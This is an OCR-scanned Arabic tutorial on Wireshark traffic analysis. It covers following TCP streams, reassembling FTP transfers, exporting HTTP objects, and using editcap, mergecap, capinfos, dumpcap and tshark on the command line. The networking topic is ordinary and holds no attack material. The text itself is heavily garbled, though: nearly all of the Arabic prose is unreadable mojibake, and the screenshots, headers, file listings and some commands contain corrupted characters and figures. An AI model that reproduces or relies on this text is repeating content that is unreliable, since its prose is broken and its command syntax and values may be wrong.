(TCP stream filter) Follow TCP Stream e > ^ *> J c^Vl c>-j^^ jj^ .2 

(f/DP por^ numbers and IP addresses filter) Follow UDP Stream ^ 3^jIS * y± c>jVI ojjUI j Jj jaj! .3 

(SSL por^ number and IP addresses filter) Follow SSL Stream r ^ c>jVI j jj jSj! .4 

(Reassemble Web Browsing Sessions) ^j^V 1 5^^/^^ 

.HTTP ^ j p-^axJI conversations sjIcI ^ ^1 jll Ai^Al ^i^aaH *^lcV tiljLjjjjl jll s ^l^a 
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Follow TCP Stream fS^A • 
f jL ^jUjjIjI! j\ .Follow TCP Stream £ <>j e >J! <^IS ^ HTTP ^ o*^ 1 jj» J^W 

yr* . Jj^JI jl UDP/TCP l>*jjjj <IPv4/IPv6 'MAC ^li <> J\ ^ conversation ^ sjlcb 

(HTTP GET request) 10 ^ iW^ 1 o> jM jj» j& ^ lS^JI ^ .U J^^ 1 t> o£ ^ Uj^bj jKl 
cijj^'j ^^11 JjVl < ^jJa^lj ;aj^U^3I jj* j jjjii ^jj dii^ .Follow TCP Stream ^ j^'j <f * 



GET / 

kost: : y*xiy . wi re thark , ora 

Lrstr-Aflint: Mftfcilla/5.0 Cwlndows NT 6.1; r V ;i6 P 0) 
G*cko/?QlQ&lCil Firefox/16-.D 
Accept : text/Ktul >app1 icatiori/xhtml+Km'J „ appl i cation/ 

AcCe pt - Lanfcu age r en -US , en ; q=0 . 5 
Accept- Encoding;: gzip* deflate 
Connection: keep -alive 

20Q OR 
Server: Apache/2 
Varyi Accept -Encoding 

X-Siog&n: If H* can »h«ck or b"Hnd you if * l*y*r 1, 

Cache— control : no- cache 

Content-Type : text/html 

Date: Sat r 20 Oct 2012 23 : 37 l 20 GMT 

Transfer - Encod i no ; c hu nke^ 

mg i " 240bl7 -4 0ad-4cblS94 J247f 3"* 

Connection: fceep-AUve 

S«-i:o«M*: rb_v*el>ptrf=J3Slf JaS; ^on«ti rt=wi rtitiark-Oifgu e-ath=/ 

Last-Modi fitd; Ty*, Q2 Oct 2012 19:32:12 Qt*T 



a 



3 



.(tcp.stream eq 0) yr* j TCP Stream index ^ j£ -^^^ 'lP 3 ^^^^ J' ^ 

f li J fl> .0 J^Uj Stream index ^ j ^^kxjj <^JiLJl ^ TCP Stream Jjt ja liA . TCP^^ J£l ajjS jA liA 

^ jaJI ^ ^.jj V JSaJI liA .ciljUijjl jll ^Uajujl jj TCP Stream 

Use Find, Save, and Filter on a Stream • 
Follow Stream tiUUa a*j a^HaI! CjI jU^JI ^ ^jAxJI ^Ua 
/j - gaj 4_LoJjuj ^jc i— ia aI] Find c3j^ 
.^j^L^xi l^Jij ^5 c '<i\a jjAjlaj ^jjj du£ lij Save As . J> ^>^^ t alx£ aj^I^JI iaiaJ Save As 

'h^ .(! tcp.stream eq 0) Stream ^ o^j^ ^W^^ (i^j <^^V Filter Out This Stream ^ 



Reassemble a File Transferred via FTP 

cjUUJI sUa .(Data channel) ^UUJI sUSj (Command channel) j^ljVl sUS c> u^jj ^^klu£3 FTP cjVU^jI 

.l^-uij 4_ilxi3l CjUIiJ! Jfc ^ JL^iVI TCP handshake c> uj^ (Data channel) 

BC5 L-aVl J j^Jl ^ 5^ sjlol 4J j^oij t^Laj ;CjUIiJ! sUS ^ Follow TCP Stream 

jj^j 4-ulj aj^>JI (Command channel) j^ljVl sUa ^ ^>JI s^Ll* JjjL ^ Uj (Data channel) ^^J' sUS ^j^j 
SUS ^Uij! ^ ULi^i .STOR ji RETR j^V! axj e >13 ^ ^^a! ^> d^J! J < Jj^jj jjJI ^ "FTP-DATA" u 1 ^ 
^ j^l iiLa jli ^(Command channel) jj-Vl CjVU^I sUS jlk^ 11a o^j '20 J^^ 1 FTP 

. (Data channel)^-M ' ^ 

^ 'Follow TCP Stream j^tj ^W 5 ' lwVi ^jUJ! j jj jisl ^FTP *^ ^ ^jULJI 5^ 

. Jtlll J£JJ! ^ ^ jA 
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gil* |dit JjMSW go Cifrfurc i^alyte StaliSiCs. TdiepJwr^ jMk pfiKrttali t}dp 

e v « a v BQxsfa ^**«taG!0s gl q q s i 

Fittt^ &pr«wiv. Cli-ii Apply Sr*C 

Pr-DlETcOf LengCh Enfo 



S3 ' 



FTP 



123 Request; RETR /pub/wireshark/prerelease/Wireshark 1. 



ISO Response: 150 Opening BINARY mode data connection for 



ftp -data IS 14 ftp Data: 



FTP -DATA 1514 FTP Data: 1460 bytes 

FTP-DATA 1514 FTP Data: 1460 bytes 

TCP 54 &46G6 > 36110 [ACK] Sec 

TCP 54 6465S > ftp [ACK] Seq=- 

FTP -data 1514 ftp Data: 1460 bytes 

FTP-DATA 1514 FTP Data: 1460 bytes 

FTP -DATA 1514 FTP Data: 1460 bytes 

TCP 54 64666 > 36110 [ACK] Set 

FTP-DATA 1514 FTP Data: 1460 bytes 

TCP 54 64666 > 36110 TackI se< 

■ Frame Si: 1514 bytes on wire C12112 

■ Ethernet II, Src; Gadant_31:bb icl (C 
Internet Protocol Version 4, Src: 13 

■ Transmission control Protocol, Src P 
FTP Data 

[truncated] ftp Data: x\332s\rbb " " i 



Mirk Pftefad (to^gfeO 
lijnar*£j<;ii«t fld^gl?} 

i S*t TnKut Rttawnet Cl#95(*3 
' T.meSWt... 
Edh or£*d P*cK<l <Le*nmtM... 

h(uuul>' R&ah.'e Address 
Apply -fti Filter 

£ a Lome C«tvfc««rt*Mi 
; Pc4tow7CP Sin-am 



FdTUw»- SSL Strran 
Copy 

I 

i Pmnt™ 
Shflw Packet Nnv 



> Len=0 
Len=0 



Len=0 

K) Len=0 

tured C12112 
t: Hewlett-. 

1123.4), Dst 
st Port: 646 

)0\000\2 50tV 



F.k-- 'C:\User... t+cbets: 22479 Dii#>Uy«J- M»iEed: 0 Lft*;) time 443-395 



.cAiLlI ^ Jij Jc o^^l STOR jlRETR ^ j-i <^ Aj^j-H 



220 {vsFTPd 2 .0, 3> 
USKR anonynous 

331 Please specify the password-. 

PASS anypwd 

230 Log -in successful - 

PORT 192 , 16B, 0.101., 206. 177 

200 PORT command successful. Consider using 

PASV. 

NLST 

ISO Here comes the directory listing. 
226 Directory send OK. 
TYPE I 

200 Switching to Binary mode. 
PORT 192 , 168, 0.101,206,17s 

20Q^_EOR"^-w»«iiiiid successful , Consider using 
ETR pantheon . j pg 

SO Opening BI£jfijj|Fn*ode data connection for 
pJTlUiM^tpijuiJ 1-4612 iiviL^I . 
226 File send OK , 
OJUIT 

221 Goodbye. 



0 



Jj-luj a(J l jj\ CjjLJI (jdulujj ^^Ip til*]) Jji^j Site dl£ «j ci-il^l Lf k- ^jl^j Stream f jS2 H£ jala 

■0x89-50-4E-47 ^IuA« png jIjIaVI ^ti uaLq ^ - JFIF ^ ^ jpg ^t^Vt cjli j>uail ciL» 4 Jli^l 

^-a-uuj dbl Sjlaj (m5 11j .( ftlail lift Jjsu ,jj Jjjj |j| uflU) lift Ig a laJL uj ^12) Aiu/iW U ufljau JjiaJl <ja 4JI 

■ (http://markO.net/soft-tridnet-e.html) ^tiUI ^ijSj TRIDnet 
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Export HTTP Objects Transferred in a Web Browsing Session *t 
.(HTTP objects) Jl\ a^L^1\ ^ ^ ^11 j^UJI U 4i l^i* jjSj J lA^ 'HTTP cjVI^jI ^ 
. cilli Ji^ij ^style sheet objects 'videos 'JavaScript 'graphics 'html 5^ fclcl 

TCP Preference c> J*^ • 

.TCP preference ^ Allow subdissector to reassemble TCP streams 4^ ^ aS\ Vjl iaAa*1\ oi* ^^31 Jj£ 
J£ ^ ^jLSjjIjII jj 4^1 jJ! ^ .HTTP objects 5^ siol 0^ V <4jL5jjI jll jli .TCP reassembly ^ f 3 ji ) 

. object c> ^ objects ^Vi.hi <u 
View all HTTP Objects in the Trace File • 
^jUjjIjJ! eJ L cii^.File I Export Objects I HTTP ^ 'HTTP #2 ^ J HTTP jjj* Jatttl *u 

.HTTP jjj* J^i^ Lgiii ^ jj^alixJI ^ia^ 
U ^i^i ^ l^fij ^1 <iti^!Objects ^ File I Export Objects I HTTP jL^L H«S < JU1I J£^l ^ 

^ j .L_JJj3l ^3 jA ^-LoLiJjll ^pa^xJl 3_JjUi s-Uj lie ^1 j^Jl ^ ^-^L ^J^ala pj^al J^*-^ -^^V . WWW.eSpn.COm j-Q 

.A^^lel (jjjla o^Objects ^ o-* 



B ^«^^ HTTP M 






Lea 1 OlHE 




Pjitrt nirfni Hkretnarnf 


Content Type 








9 




-•■■> !■::•:! 




\ 






{rfW 




H£*T 






19 




V-! l-'i-il 


2e6&" 


\ 




132 


flrttpne-dn torn 




74661 






ITS 


J.Kpnr.dn.ciirn 




309234 


bSn-totfjIe-tifcilel.i-H 




1BD 


r^ii'^s-v-rs s.n*r:et ion 


-( : .rn! 


329 


beief?url5 http:SJF?JFc5pn.go.comHFfiali 




291 
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320 


aL .tspriidrvttinn 






1 3 _ f >c n t pig e . red j p q 




129 


« (Mi k <J m ■ H . e-mri t (ft . n ri 






rt tndv d ? m bo iHc-5t= *ip rtg o.i om(i rnbtA 










US. 


S<Ki|l_i+crti«:k_l-t.prt5 




34 


















11-1 
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n 




[ 







c^L ^> I^aj ^ij CjULJI ^ j^uj ^jii HTTP object list window $iaU 
.CjULJ! Jij aAac, J£ ^> J jVl f jaJI ^ Packet num ^ 
CjULJI Jij J£ c^L^ ^j3I GET request c> http.host ^ j^jj Hostname 
t(JHall Jj^ .gif; .jpg'.png) ^ cjUjIS jj^i .objects J^Aj Content Type ^ 

.(.flv ji .swf Jti*l! lW^ C5^) J^^t ^ ^ J 6 (.js J^) 

. JjiiJI o^^t j^Aj Bytes 

(index.html J**) c^ 3 ^ j^^^ j> ^wll jjAj "\" jlkJI jjISJI ^1 j^jj Filename ^ >^ 

.HTTP j^SII ^jjuj ^5 lij ^Ijjia US j cij^lojj 11a j . jj>^U ^UMl j Save All 6CjUj1£3I 5il£ jj.^^M 

^ j .ess HTTP Object List window j^j ^ ^ j^ 31 c1jULJI ^1^1 c> ^ c> ^ V ^ !i ) 
JUjI dip. . http : //www . f ileinf o . com/help/file extension -Wjll ^ '(Cascading Style Sheets 

_cijliL<JI ^ jill 11a ^ i^iLujj ^^jll ^dl^)i3l L_flLJ! ^ ji ^1 cii^JI ^ L_aLJI ^l^ldl 

(j^ljSfl jlaui ^tJiSMil) Use Command-Line Tools to Capture, Split, And Merge Traffic 

iiLa ^Vji J jSI tiLa i^jLoijVl (j-d ^cl jslU d^Ic (j-^jj V .(Conversation) (jc ojUc CjVU^ajVI 

^^^aj uAaJI (^s&u J^VI fljlall (J*^ ( ; UjujJ ^-aJJj ' ( ; n £ " '^^J UJ^ ^'^c i— l>laj (^aj ttilli J jij ^j) ^iLludj (^aj 'U3U <J jSI 

.^iull JjJaal tilli ^jl£ UJ£ tciiV j£ jj jjJl U^ jl jjjjliVl j etymology Uiia^xi j|j UJ£ c ,% n^> 
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• EDITCAP 

editcap -h: View Editcap parameters. 

editcap -i 360 big.pcapng 360secs.pcapng: Split big.pcapng into separate 360secs*.pcapng files with up to 
360 seconds of traffic in each file. 

editcap -c 500 big.pcapng 500pkts.pcapng: Split big.pcapng into separate 500pkts*.pcapng files with up 
to 500 packets in each file. 

• MERGECAP 

mergecap -h: View Mergecap parameters. 

mergecap files*.pcapng -w merged.pcapng: Merge files*.pcapng into a single file called merged.pcapng 
(merge based on packet timestamps). 

mergecap a.pcapng b.pcapng -w ab.pcapng -a: Merge a.pcapng and b.pcapng into a single file called 
ab.pcapng (merge based on the order files are listed). 

• TSHARK 

tshark -h: View Tshark parameters. 

tshark -D: List the available capture interfaces that can be used with the -i parameter. 

tshark -i2 -f M tcp M -w tcp.pcapng: Capture only TCP-based traffic on interface 2 and save it to 

tcp.pcapng. 

tshark -il -R "ip.addr==10.2.1.1": Capture all traffic on interface 1, but only display traffic to or from 
10.2.1.1. 

tshark -r "myfile.pcapng" -R "http.host contains M .ru MM -w myfile-ru.pcapng: Open a trace file called 
myfile.pcapng and apply a display filter for the value ".ru" in the HTTP host field-save the results to a file 
called myfile-ru.pcapng. 

a\\ CM1a1\ j! jjj£ £jjj lHa J_ 

100 L>* J$ L_aL» Jc <J jj^^J! jj^oj .Sj^ £f£Jl Clal aL> £A i^ax1\ JJC- !jj^ ( . U^Lujj V J^> ^ lilaJ ~y gaJ q\ (j£-aJ (iljLuijj! jll 

t ala ^aj t stem name j Jll dial* ^ dilc ^ c _^& (File Set) c die ^ .^j^l cJ^-*^ al*!! JjKM dilc ^ 

.£tJjljl!j CllS jl! £j! Ja ^jC ^LjaS 4£JJjJ! 

iiL o^aliJ) jluuxil J) djLS jj! jit dUnM jI^ 3iL2a! • 
dlLflaj dial* ^ J Editcap.exe c aLili ^ij .1*-* iajjjj jl! ^>i^al dial* J! &j^1I dlil*l! ^j > editcap ^a^Luaj 
jk^ dl j J j* ^1 jl) editcap ^^i^V .(^V*l! !ja ^a^* jjjjLi] Help I About Wireshark I Folders ^ j) ^ jll 

.(iljLoijjl jll ^c*ljjj ^ jIjua* AiLjaj tjl^* ^1 <j* (4_^.jj*1! ^*! jVl 

Jc c£jJ^J (^ill ^> *l! cJallj) ^aJ JIj*jj3!/^*! jVI jia^J (J^aliJ! jLai*l! Jl ciljLSijj! jl! dljjilaJ jl^* jLoi* AiLjal JJ^**J 

i o^j tilj£ .editcap d^yLdlstxi ^j^^ ^3^x1 editcap ~h s-^l . > -^Vl cjliLJI ^ <c a Jl 1 > >iVi -ijjj Jll ojjAII dal aLall 

.(-i option) J'j^W ^j^^ jl^u o>Luji Je jl (_c option) o>l^i J^ 

Use Capinfos to Get the File Size and Packet Count • 
Capinfos uj^>^ ^ -c^-^ J^JI J t^^l CjUL J ajjoLJ cjU jix-d ja jj Jl! ^1 jV! Ja^ sb! y> Capinfos 

^^Luj .capinfos <filename> ^l^j Capinfos >^V! ^Uj ,t«S jl^j^ j^l J ^j^j^ J» j jLS jj! j3! ^ 

.^Lojjujjj JjS ^jjj3! t jjc-j (^jj^i) JalijlV! Jc jjj*I1 Capinfos 
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c ; ■. t ra< e_f 1 1 c £-pcapn$ >c ap tnf http -d i sneylCi .. pc apa g- 



FIT* riAra; 
F^e type; 
File ^ACapSul ati tsn ; 
Packet Si£* lirit: 
Kusber of packets: 
File size: 
Data 5izer 
Capture, duration ; 
Start time: 
Ercd time; 
Data b^te rate: 
Data bit rate; 
Average packet size; 
Average packet rate; 

BIPfMOLSO: 
W5S: 

Strict ti^e order: 



h C T p - di sne ylOI , pcapn-g 
wi resha.rR - pcapn^ 
Ethernet 

file hefrr Cnet set> 

6364504 by tea 
mini bytes 
2* seconds 

Wed Oct 24 15: '01:11 2012 
Wed Oct 24 IS: 61: 45 2012 
254144. 72 bytes/sec 
2033157,76 bits/sec 
*S7.76 bytes 
257.2* packets/sec 

4Saa* C17163S 3 5632 7S 24dIe69Sbl63e{ib6alb9d 
145495 Baeaec 2Bl 7S6d69e l20db? 5 32c Scedadce 
214 a Ibee34eb*5 2 dc49de9 d 7.2 2baf0bt> 
True 



Ci \trace_fi les-pcapngi> 




(^jaJI jjp uiuA ^ uiUll ^Sj) Split a File Based on Packets per Trace File • 
^illj ^Ijll £±2ll c^L ^SjI editcap -c 1000 a.pcapng alOOOsetpcapng t^JUll Jiill ^ 

.L^ia J£l ^>Ji c> 1*000 c> ^ cs-^ ^ c/J 1 ^ c?^'j (al000set*.pcapng) ^AiLlI ^> a^^^ J) a.pcapng 



e:\tr«t_fi les-p£apng>ed1t<:ap -c 1000 a.pcapng aicooser.pcaiinfl 

c; \tra-ce_.fi 1es-p-ca£nti>d1r alOOflses* . x 
Volume in dnvc C u OS 
Volume Serial dumber it BC41-E33D 

Directory of C: \traCe^fi lii-pcapng 



10/21/2012 
10/21/2012 
10/21/2012 
10/21/2012 
10/21/2012 
10/21/2012 
10/21/2012 
10/21/2012 
10/21/2012 



02:13 
02:13 
02:13 
02:15 
02:13 
02:13 
02:13 
02:13 
02:13 



PM 
PH 
PM 
PH 
PM 

9 File (s) 
0 DirCs} 



C; \trace_fi les-pcapng> 



711,016 alOOOset_OO0OCi. 
922,916 alOOOset_OO0Ol 
l h 063, 226 al000set_0O302_ 
1,075,656 alOOOset_OO0O3 
l fc 07S,032 alG00set_O0OO4. 
l h 070, 106 alO00set_O00OV 
l h 094„904 al000set_00e06 
1,073,366 alOOOset_OO0O?_ 
33,924 al000set_0000&_ 
6 4 H6 k 9 52 bytes 
207.167,660,032 bytes free 



,201107071639-00. 
2011070716 390S . 
,20110707163912. 
20110707163*13. 
2011070716 391 5. 
,20110707163917. 
2011070716 3*18. 
,20110707163920. 
,20110707163921. 



pcapno; 
peapng 
pc sprig- 
pcapngi 
pcapng 
pcapng 
pcapng 
pcapng 
pcapng 



(cjSjJI uua uiUA ^Sj) Split a File Based on Seconds per Trace File • 
qa icj^auj J) b.pcapng <y£]' editcap -i 360 b.pcapng b360set.pcapng *j13£j Ll*S ^Ull J^it ^ 

J 1 <*>^ V ^jUjjIjII . jj^xJ! l£ c> 360 (Ji ^ ^ lSJ^ 1 J^h (b360set *.pcapng) ^jULJ! 
^> a^Ij 360 c> Jai j^jVl ^ jj^VI .l^ja c> ^ 360 c> 3bB JSi ciliUL jjSj cillil ^360 ^^Ji 

.00014-00000 '^jAj ^iiil! CjUL 15 J\ tiul b.pcapng ^1 ^ editcap ^V! r lS <UM* ^ .jj^ 31 



C : \trace_f * 1 cs -pcaprlgs-di r Set - . * 

Volume in drive C is OS 
Volume Serial Number is BCA1-E 19D 

Directory of C:\trace_files-pcapirg 



10/21/ZOL2 
10/J1/Z012 
10/21/JOJ.2 
1O/21/J01S 
lO/Sl/JO^ 
10/2i/?5t2 
10/51/2012 
10/21/2012 
1C/J1/2U12 
10/21/2012 
10/31/2012 
10/21/2012 
10/21/2C-L2 
10/21/2012 



02:13 PM 

02: LS PH 

02: LS PM 

02 MS PM 

02: IS PM 

02MS PM 

02: LS PM 

02: LS PM 

02:18 PM 

02; LS PM 

02: LS Ph 

02: LS PM 

02: LS PM 

02: LS PM 

02: LS PM 
IS File(s> 
0 DirCs^ 



Si 7 . a 2S b aeose t_onooo_20osci2 l? 202 244 . 

900 . 3*4 b afcOse t_QDODl_20Q-5ti2 L7202E44. 
1 , 461 . S 24 b SeO*e E_QQO02_20ClSCi2 L7 2D 3-4* 4 . 
L , 064 . S 4* b 16016 TI_ODOD 3_20QS U2 L72 04£H 4 . 
1 , . S iG b 3 60 56 T_0QOD^_2O0SCl2 L7 3 Q J ^4 4 . 

€G7.?"C b 3 GC-^ft I._C-0O0 S_20CS02 17 2 Q 5 . 

**1 , 30* b 3G0*e T,O0OOS_2O0SO2 L7 20 5 544 . 

969 , 260 b 360S6 t„O0O07„2OOSO2 L7210444 . 

97» , 656 b 360SC TL-OOOOS_200S02 L7 21104 4 , 
1.556.056 U 360se t-00O09_20CiSO2 17 2116*4. 
L . 4£0 . 544 b 360S4 1 ^O0OLO^2O0S02 L7212 244 , 
1. + 5*. 592 b 360se t_O0Oll^2O0SO2 L7 2 1 2 84 4 . 
L , 071 , 3641 b 360SC t_O0O12^2OOSO2 L7 21 3444 . 

741.66S b360st t . ^02L72l4044. 

90 . *S6 b 160se t_000l4_200a02172l4644 . 
l<i ,."07 , S20 byt-es 
207,l3 7.*lS h 976 bytes free 



C ■ \ trace_f i 1 es-pcapn g> 




Open and Work with File Sets in Wireshark • 
^i^jjujI .File I Open ^I^jLuAj cjULJI <c q < aLa ^1 ^ jij ;tiljUjjjj| jll CjliLJI <c a ^ J-^^ 

^UL3I cJ^^ File I File Set I List Files 
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b& £Cji3 £J^« <— (J) ^Lal JjLLJl JJ Jc Jsi\ .djUL 9 Jc- LSj^d C aLili <C J L-flLa J L-L^jj (jaJ < J^ J^j^I J 

(SjjjlU ^ cjliLj ^j) Merge Multiple Trace Files 4- 

CjIaKII ^jc Clival] (jlajxll jJ^lfl (jJfla^ dfl jll jj3 jJj 4 <J^ IO Graph ^>*-^ dliLa d^C J L_JC. jj 

jiajl ciljUijjl jll cjlinlaj J Mergecap.exe ■ ^ j J ^>*-^ a ^^ cjUL jjj £-aaJI Mergecap ^ ^v^Wi 

.(Help I About Wireshark I Folders I Program) Jl 
-w j^pJI Mergecap JjL£j • 

.djIjLikJI ^-i^ mergecap -h ^ ^ J^l cjliLJI Jc ^jii^j ^ill ^l^JI <J£ij! ^ ^>^jVI ^ 

^ jll LjJJJjjll ^jjjLujI Jc diliLJl —a lW-*-*^ ^ iklLuil jl ( C5 jJal jjaVI) *Liia jl! £j| Jail (JjjLoiI Jc <Lajla3l diliLJl aJ 

d flLa ULulj) 6 J til I <j£Jo3l J / . lL*all (j^ajall Jc AJ*1> £JJJ i qU AJu&l j _w J^IscaII ^bViml 4jUrv pUSl *Lajta 

.c30set j bg l$J Jll dULJl AilS ^ JjjL c.pcapng 



C: \trace_fi'1e5--pcapng>dir cSOSet*. * 
Volume in drive C is OS 
Volume Serial Number is BCA1-E39D 

Directory of C:\trace_fi1es-pcapng 



10/21/2012 Ol: 45 PM 

01-45 PM 

3 F"i i t*CS> 



, 93 JL . J ?t} c *D5eT_uQQ01_?u 1 7 J, 01" 1 J 1 C 7?S . pc Jpjig 



?4 , 6*9,97? b>Ul 

0 sir <s^ 200 , 463 ,118,3 36 byte s f re* 

c : \trate_f i : 1es-pcapng>n*rge-tap -w cpcaprtg c30set T ".* 

C: \ trace_f f 1es--pcaprvg>*dir c ^pcapng 
Volume in drive C is 05 
Volume Serial Number is BCA1-E39D 

Di r ec tor y of C : \ trace_f i 1 es-pcapn g 

14/07/2012 OS: 15 24,369,296 cpc^png 

1 FiU(.s> 24 r 669,29« 
0 0-ir{sJ 200,463.113,336 fcy^ei free 



\ tra^ c„f n*i -pcapn g?„ 




(Capture Traffic at Command Line) j*!jSfl jla*- ^lillujb ^jaJt LllLSI 
C5^^% tsljl^jjl jll V j^'jVl J JaUBlV tshark.exe jl dumpcap.exe >»VI ^^Luj 

^Dumpcap or Tshark • 

^Ullldumpcap.exe ^ j^ J ^ 'Tshark J^-^ ^ ^ .-^ JalUll sbi Dumpcap .^l^^U jA^ Jl^ liA 

^ jjSSU JjJaflVl jb^Ji ^W^j Uui djUlsLxJI AjaLjal (post-capture) JaUBlVI a*j Cj^U^ Jc^ Tshark .JalisSVI 

j^JI j^Tshark ttSlli t^^Lk /ojJjU^ dumpcap ^b^*^»ili toj^lill j jjs ^ J^ lij .CjVI^JI 

dllniaJ lla o J dlj^VI (J^ .(.pCapng) t aLoJi Jl JJJ-* ^J^- Jal^V J>»ljVI jia^J J (jJjbVI 4^1 (Jj*-^ <Lj 

L_ali^j Jaisai jfili ^l^luil ^ <lj <^Ij^ ^ J^ JjVI .(Help I About Wireshark I Folders I Program) ^jLSjjIjII 

m( j J±\ JaUjII CjI Jl^&j 

Capture at the Command Line with Dumpcap • 

. j-aV! Ia^j 3 > al ^\\ jLrLlI ^-i^ j-qI jVI Ja^j J dumpcap -h <clikj 

AAC jll ^jujI ^jC JJs«-a31 ~1 laJL ul . J^^ cJ^juJI J ^jJa ^ Lft£ jlxJl jll ^pajxJ dumpCap -D ^y^\ 4x.LllaJ ^aS 



l\\.\airpcapOO (AirPcap U5S wireless capture adapter fir. 003 
|\\., \airpcap^in-y (AirPcap Multf -Channel Aggregator) 
/\\.\airpcap01 [Air Reap USB wireless capture adapter nr. 01) 
' \Detice\NPF_{fiE7 , 5FEC0-FF? 1 3-4970--96E4*EEFFiO0A*B4F> Cfteal tek 



C : \ trace s -general^ 
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L -^ A c^! fO^' t> 2<000 ^ Lutils dumpcap dumpcap -c 2000 -w smallcap.pcapng 

.smallcap.pcapng 

J gr>'j^ c> ^ jjj* ^ JalS^VI (KB) filesizern jt (M^) durational ^ -a ^l^i^l 

dumpcap -il -a filesize:1000 - <-£^ 4 cW^ ^ -OJ*^ 4? o- 3 ^ 

.1000 KB ^ lU^ J ^ LiSUas JaUaiVI ^ULV w lOOOkb.pcapng 



C l \ trace s -gene r al vdurrpcap - i L -a f ilesize: 1C-DO -vj lfjCOfcb , pcapng 
Cap tUf 1 nq on \Devi ce\NPF_{6EF9FECD -FF79- 497G-96E4-.EEFF 9FJ 

File;: lODOkti. pcapng 



1 



Packets captured: 1L5J 
Pickets receded/ dropped *n interface \cwvice\pnPF_(«79FEC0-FF79-«7O-«e4-EE 
A969F}r U53/0 aco.no 

C:\traces-general> 



Capture at the Command Line with Tshark • 
?jk Tshark 'tshark -c 100 -w lOO.pcapng 6 jjj* -S^&IV dumpcap ^ Tshark 

^^uixill JalijlVI ^jUtj ^LSll dumpcap cJ^^j 
~ laJLaai ^fiill c_ al <\\a\ A^l\jual\ djIjLik (j^aau Uiajl ^SsH l^i^l t ^ajoj JaliiilVl ^lAasl! I^I^jjoj! (j^j Tshark 

.Tshark j*l jVl J^U <> LU&V cjUI^VI c> ^>3I lJU^V tshark -h 
-i jU^JI ^ ^^.l jft ^jujI (jc ^>^-a31 ^L^l ~ i^Loai 'dumpcap c_ L*Laj .s^a jl<JI jll ^pa^xJ tshark -D ^l«^Luit 

djUL a*\ 11* a Tshark ^ ' JIUI .U j^ll ^ JJa tilUA ? dumpcapc)-* Tshark ^ «j tiUJ 



.myport80.pcapng ^ ^-^j port80.pcapng j* j IP Address lP 3 ^^ ti^4? ^ '<^t J^Jl 



I ~ ~ZZ 7TTZ 

C;\tracei-genftra1>tsfiarh portEO. pcapng -R ,r ip. addr*«24. &. 172. 12C"' 
tflO. pcapng: 

C : \trace s-gen eral >di r *portBO . pcapng 
Volume in drive C ii OS 
Vo-lume Serial Number is BCA1-E1SD 

Directorjf of C:\tracei-general 

10/21/2012 03:52 PM 133, 1£*. 3*4 pon-30, pcapng 

2 F^1eCJ> 135S r lK,75* &>MS 

0 Dir{i? iOfi.s^i.isi^FZ bytes fre* 



-w mypor 



; '■. trace S-grhrril 

(Use Capture Filters during Command-Line Capture) 6^ -Sa^VI <A*c> * USl iatiUVt 4- 

a! jk£* ^ LlSSlVI e Ui3l ^ Tshark j> dumpcap ^ 

jjla (jjuin a I ikiujl j laliiilVI ^j^j3 -f jU^Jl Ld^kiaaj Tshark j dumpcap ^ tJaliiilVI <Aat* S^lL * jjj^^ 

J^ljVl ^ ^U3l ^V! J^^ 'TCP 21 ^ ^Jc lUu 4£ J£ lalSai ^J^JC±^ lij 4 JUJI lW- .(BPF) JalialVI 

^^k^l Uj^j JalislVI . Jl^ll lS^JI ^ ^ 'dumpcap -il -f M tcp port 21 M -w port21.pcapng 

(CTRL + C) 



e:\trace4-Mn*ril?^rnBeap' -fl -f "tep port 21"' -w "portal. pcapng" 
capturing <n \D*vite\NfF -1 cef79rtto-FF75-Jt7&.9te^'EEFf3coA96»F} 

Pil*: p*rt2i. pcapng 
packet s: 102 _ 



jjjJ! a£ j^J TCP 21 iaiJi -^^VU UaS ;^U3I lS^JI ^ « lW^ ^ .^t Tshark i^U^V! 

.-wj '-f '-i ^ ^l^i^U myport21.pcapng c^! 24.6.173.220 c> ji 

jj^li tshark -il -f M tcp port 21 and host 24.6.173.220" -w myport21.pcapng Jtt\Z j-Vl ujV* 
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C ; \ trace s -aere r a 1 >tshark -il -f "tcp port ?1 and host: 24.6.17 J. 220 ,r -w "mypor 
t21.pcapng 

Capturing en R-ealtek PCI* F6 Family cen^crqil^eir 



.^LaJI Jlxill ^ U£ ; jiill <ijj^a cjU.Loix» tiL^ '^jjj^ Quotes .quotes 
(Use Display Filters during Command-Line Capture) 6* JatfSWt ^aIap f^l o^j^l jfili ^t^j^it *k 

_ jUaJ! tilli ^Ia^IujI f.Uj| 

(jj j '(^Vl til (Set of File) L - J ^ c ' * j>) J) ^ 6 jjj*^' cJ^ -iaL&lb ^Sa <^l liA i jn>n 

.•Ip^ £JJJ ( flla Jl ££jU3l J (Ja jQ^ all £fliJl t flLo Jc- (jla^xJl JJ^i 

JaUSW iaU&VI j^la j^Vl Jji J <Jli*II lW^ J& <tcp.analysis.flags j^l' Jl! jll ^>J! Jalislt ^jjj c±& lil 
^^^j L_aLa Jl Igh^ j TCP j^J ialiavi ^A^u U*S < Jtill JUJI J .l^L Jl a£ j^JI oi* iai^j TCP jjj* ^£ l£ 

. JjVl SjJaaJ! ^ 11a .tcptraffic.pcapng 



a \6race_^1*s-pcapn.g>tshai-fc -14 -f "tcp" tcp? r.aff -sc. p« apng 

Captirring- r>n Real tek Ptle FE Family Controller 

£355 

C: \irac#_f ^ Tes -pc-apng^ 



C: \tra-c*_f r >les-pcapn-g>tshark. -r "tCptfaf f ic.pcapng" -R " t£p. anal ys i s.f Tigs -w a 
nal y s i sf 1 ags . pc aping 

c: \trac*_f n es -pc^png^tf T r AnAlysl sfla^s.pcjtpireg 
v&iynw drive c ts OS 
volume Serial Number is BC*J.-tJ9o 

Di r ec tory at C : \trace_f 1 1 es -pc apng 



1L/OS/2012 09:14 AM f!,4?6 analy si sf 1 ags.pcapng 

O pi r C s^ 20Q . .12 7, SIS haft's Tree 
C : \trjce_f i 1 e$ -pcapnj^ 

jjjj uoIq (jja f Luo^VI j Sji^o Jji^i jji^U Tshark ^ ^ 

. Tsharkj-bVI sbl 

J^ 3 ] djUL^a^Vl JJ v ^aJ j J ji^Il jJ^aJ CjljLlk ^jjoi ^aJJ .<^.ll<Jl CjljLlkJl ^pa^xJ tshark -ll J-^VI - iklLoai 

(dj^ Jji^ ^jS jja^j) Export Field Values • 

^311 J jLJU a-ojIS j jjoj .V jl _T fields ^j>^t f h^>.il 

tshark -il -f "dst port 80 and host 24.6.173.220" -T fields ~e frame. number -eip.src -eip.dst ~e tcp. window _size 
jl! j jjl^JI IP ^jU^ 4 jUaV! ^ 4^1 jll ^ 80 24.6.173.220 c>/^ ! jjj* ^ ^ j 

.TCP window size 

